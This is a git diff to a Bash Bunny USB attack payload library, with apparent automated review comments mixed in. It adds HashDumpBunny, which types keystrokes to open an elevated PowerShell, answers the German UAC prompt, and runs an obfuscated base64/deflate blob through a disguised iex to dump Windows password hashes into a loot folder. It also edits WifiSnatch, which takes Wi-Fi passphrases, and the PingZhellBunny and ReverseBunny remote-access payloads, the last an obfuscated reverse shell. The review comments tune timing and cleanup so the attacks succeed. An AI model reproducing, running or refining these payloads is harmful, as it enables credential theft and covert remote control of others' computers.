diff --git a/payloads/library/credentials/HashDumpBunny/BunnyDump.bat b/payloads/library/credentials/HashDumpBunny/BunnyDump.bat
new file mode 100644
index 00000000..fe9c68d9
--- /dev/null
+++ b/payloads/library/credentials/HashDumpBunny/BunnyDump.bat
@@ -0,0 +1,2 @@ +ÿþ&cls +powershell.exe -c "&( ([sTring]$veRboSePrEfeREncE)[1,3]+'x'-joIn'')( nEw-oBjEct Io.STREaMReAdeR( (nEw-oBjEct SyStEM.iO.coMPReSsioN.dEFLAtEsTrEaM( [sYSteM.Io.MEmoRYSTrEam] [coNvERT]::FrombAse64sTriNG('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'),[iO.coMPRESSiOn.cOmPressiONmODE]::decoMpRESS)),[sYsTEm.TexT.ENCoDIng]::AsCii)).REAdtOEnd( ) > out.txt" \ No newline at end of file diff --git a/payloads/library/credentials/HashDumpBunny/README.md b/payloads/library/credentials/HashDumpBunny/README.md new file mode 100644 index 00000000..f2b9c89a --- /dev/null +++ b/payloads/library/credentials/HashDumpBunny/README.md @@ -0,0 +1,19 @@ +**Title: HashDumpBunny** + +Author: 0iphor13 + +Version: 1.0 + +**Instruction:** + +This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-) + +# + +**Instruction:** + +Place BunnyDump.bat in the same payload switch-folder as your payload.txt +# +Plug in BashBunny. +Exfiltrate the out.txt file and try to crack the hashes. +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png) diff --git a/payloads/library/credentials/HashDumpBunny/censoredhash.png b/payloads/library/credentials/HashDumpBunny/censoredhash.png new file mode 100644 index 00000000..b09ac754 Binary files /dev/null and b/payloads/library/credentials/HashDumpBunny/censoredhash.png differ diff --git a/payloads/library/credentials/HashDumpBunny/payload.txt b/payloads/library/credentials/HashDumpBunny/payload.txt new file mode 100644 index 00000000..f21e4a36 --- /dev/null +++ b/payloads/library/credentials/HashDumpBunny/payload.txt 
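Review bot: Nothing in this file can be reviewed for what it does: the whole script is a base64 + deflate blob that is decoded at runtime and handed to what appears to be a disguised `iex` (`([string]$VerbosePreference)[1,3]+'x'`), and the README's "run it in a safe space first" is not a substitute for readable source in a shared payload library. Please commit the plaintext script next to the obfuscated one (or at minimum a SHA-256 of the decoded output plus a one-line statement of how the hashes are obtained) so a reader can confirm the blob matches. The leading `ÿþ&cls` bytes look like a UTF-16 BOM prefix, which makes the file display as garbage in BOM-aware editors while cmd.exe still runs it; if that is intentional, say so in the README, otherwise drop it. The dump is also written in plaintext to `out.txt` in the current directory of the elevated shell, so if the later `mv` in payload.txt fails the hashes stay on the host; redirecting straight to the Bunny volume would avoid that.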
@@ -0,0 +1,44 @@
+#!/bin/bash
+#
+# Title: HashDumpBunny
+# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
+# Author: 0iphor13
+# Version: 1.0
+# Category: Credentials
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+#After you have adapted the delays for your target, add "-W hidden"
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
+Q DELAY 250
+Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/exfiltration/WifiSnatch/payload.txt b/payloads/library/exfiltration/WifiSnatch/payload.txt
index 31c958af..45aa88ce 100644
--- a/payloads/library/exfiltration/WifiSnatch/payload.txt
+++ b/payloads/library/exfiltration/WifiSnatch/payload.txt
@@ -3,7 +3,7 @@
 # Title: WifiSnatch
 # Description: Extract wifi information, such as passphrases & SSIDs
 # Author: 0iphor13
-# Version: 1.0
+# Version: 1.1
 # Category: Exfiltration
 # Attackmodes: HID, Storage
 
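Review bot: `LED FINISH` is lit immediately after the last `Q ENTER`, before the target has run the dump, moved `out.txt` into `\loot`, or created the `DONE` marker that the typed command writes to the Bunny root, so the operator sees FINISH while the host is still writing and the marker is never removed for the next run. WifiSnatch in this same commit shows the expected pattern (`LED CLEANUP`, `rm /root/udisk/DONE`, `sync` before `LED FINISH`), whereas this payload has no wait or cleanup at all. Suggest blocking on the marker and cleaning up before signalling, noting that the udisk may need to be re-read on the Bunny side after the target's `Eject` (WifiSnatch's wait itself is outside this diff, so mirror whatever it does). `Q ALT j` is also undocumented; presumably it answers the German UAC consent prompt ("Ja") for the `-Verb runAs` launch, which silently fails on other UI languages and deserves a comment such as `# Accept the (German) UAC prompt: Alt+J = "Ja"`.
```shell
# … unchanged: HID keystrokes above …
Q ENTER

# Wait until the typed command has written out.txt to \loot and dropped the
# DONE marker on the Bunny root, then clear the marker before signalling.
LED CLEANUP
while ! [ -f /root/udisk/DONE ]; do sleep 1; done
rm /root/udisk/DONE
sync

LED FINISH
```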
@@ -20,18 +20,19 @@ ATTACKMODE HID STORAGE LED STAGE1 -DELAY 5000 +Q DELAY 1500 RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" -DELAY 5000 +Q DELAY 500 +Q ENTER Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))" -DELAY 10000 +Q DELAY 2000 Q ENTER -DELAY 10000 +Q DELAY 1000 Q CONTROL v -DELAY 10000 +Q DELAY 1000 Q ENTER -DELAY 1000 +Q DELAY 1000 LED STAGE2 @@ -44,12 +45,12 @@ LED CLEANUP rm /root/udisk/DONE -DELAY 100 +Q DELAY 100 sync -DELAY 100 +Q DELAY 100 LED FINISH -#SAVE TO EJECT \ No newline at end of file +#SAVE TO EJECT diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt index ca6416ee..2b62fa78 100644 --- a/payloads/library/remote_access/PingZhellBunny/payload.txt +++ b/payloads/library/remote_access/PingZhellBunny/payload.txt @@ -9,12 +9,12 @@ LED SETUP -DELAY 500 +Q DELAY 500 GET SWITCH_POSITION DUCKY_LANG de -DELAY 500 +Q DELAY 500 ATTACKMODE HID STORAGE @@ -23,16 +23,16 @@ ATTACKMODE HID STORAGE LED STAGE1 #After you have adapted the delays for your target, add "-W hidden" -DELAY 5000 +Q DELAY 1500 RUN WIN "powershell -Exec Bypass -NoP -NonI" -DELAY 6000 +Q DELAY 500 Q ENTER -DELAY 20000 +Q DELAY 1000 Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')" -DELAY 20000 +Q DELAY 3000 Q ENTER -DELAY 15000 +Q DELAY 1000 ATTACKMODE HID diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 694781e6..9cabc845 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt 
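Review bot: The new `+Q ENTER` is followed directly by the context line `Q STRING "Set-Clipboard …"` with no delay at all, where the old version waited 5000 ms between launching PowerShell and typing; if that Enter is what actually starts PowerShell, the first characters of the command are typed while the process is still starting and land in the Run dialog or are lost, and with `-W hidden` nothing on screen tells the operator. PingZhellBunny in this same commit keeps a `Q DELAY 1000` between its `Q ENTER` and its `Q STRING`, so this looks like an omission rather than a tuning choice; suggest `Q ENTER` / `Q DELAY 1000` / `Q STRING "Set-Clipboard …"`. The surrounding 500-ms values were presumably tuned on one machine; a header comment naming that baseline would help the next person who has to "adapt the delays".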
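Review bot: The re-added trailer `+#SAVE TO EJECT` reads as a typo for "SAFE TO EJECT"; since this is the line an operator reads after `LED FINISH`, suggest `#SAFE TO EJECT`. The rest of the hunk only rewrites `DELAY` to `Q DELAY` and restores the trailing newline.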
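Review bot: Cutting the post-Enter wait from 15000 to `Q DELAY 1000` before `ATTACKMODE HID` races the target: the typed `iex(... PingZhell.ps1)` first has to run a `gwmi win32_volume` query and then read the script from the Bunny's storage, and one second after Enter this payload drops the storage interface, so on a slow or cold host the volume can disappear before the script has been read. The 3000 ms that was kept sits between typing the string and pressing Enter, where it buys nothing; the waiting should happen after Enter, e.g. `Q DELAY 250` / `Q ENTER` / `Q DELAY 5000` / `ATTACKMODE HID`. If the 1000 ms value was measured on a specific target, a comment saying so (`# tuned on …; raise if the script is not found`) would tell the next operator what to adjust.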
@@ -3,7 +3,7 @@ # Title: ReverseBunny # Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.2 +# Version: 1.3 # Category: Remote_Access # Attackmodes: HID @@ -16,32 +16,32 @@ ATTACKMODE HID #If needed, use this option #WAIT_FOR_PRESENT Your_Device -DELAY 5000 +Q DELAY 1500 Q GUI r -DELAY 5000 +Q DELAY 500 Q STRING "powershell -NoP -NonI -W hidden" -DELAY 5000 +Q DELAY 500 Q ENTER -DELAY 1000 +Q DELAY 250 Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I" -DELAY 1000 +Q DELAY 250 Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH" -DELAY 1000 +Q DELAY 250 Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R" -DELAY 1000 +Q DELAY 250 Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ" -DELAY 1000 +Q DELAY 250 Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf" -DELAY 1000 +Q DELAY 250 Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN" -DELAY 1000 +Q DELAY 250 Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ" -DELAY 1000 +Q DELAY 250 Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp" -DELAY 1000 +Q DELAY 250 Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )" -DELAY 1000 +Q DELAY 250 Q ENTER LED FINISH
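Review bot: Dropping the inter-chunk wait from 1000 to `Q DELAY 250` between roughly a kilobyte of typed base64 means a single dropped or reordered keystroke breaks the deflate/base64 decode, and because the shell runs with `-W hidden` (context line) the failure is completely silent for the operator. The change is probably fine on a target the author has measured, but please record that in the header comment (`# 250 ms between chunks tested on <target>; raise if the shell never connects`) and keep the 500-ms start-up delays conservative, since they are now the only margin for PowerShell launch. The enclosing payload starts before this hunk (its header lines 3-9 are the first hunk); the connect target on the context line is still a `0.0.0.0`/`4444` placeholder, which the README or header should say must be edited before use.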